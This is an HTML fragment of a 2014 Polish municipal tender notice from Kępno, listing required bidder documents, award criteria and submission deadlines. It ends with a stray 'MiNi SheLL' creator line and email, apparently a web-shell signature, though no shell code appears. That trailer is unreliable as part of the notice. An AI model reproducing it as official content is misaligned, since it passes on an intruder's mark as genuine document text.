<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o ilości osób zatrudnionych na podstawie umowy o pracę stanowiące załącznik nr 11 do SIWZ lub zaświadczenie z Zakładu Ubezpieczeń Społecznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Ilość osób zatrudnionych na umowę o pracę - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Kępnie
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie - SEKRETARIAT
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com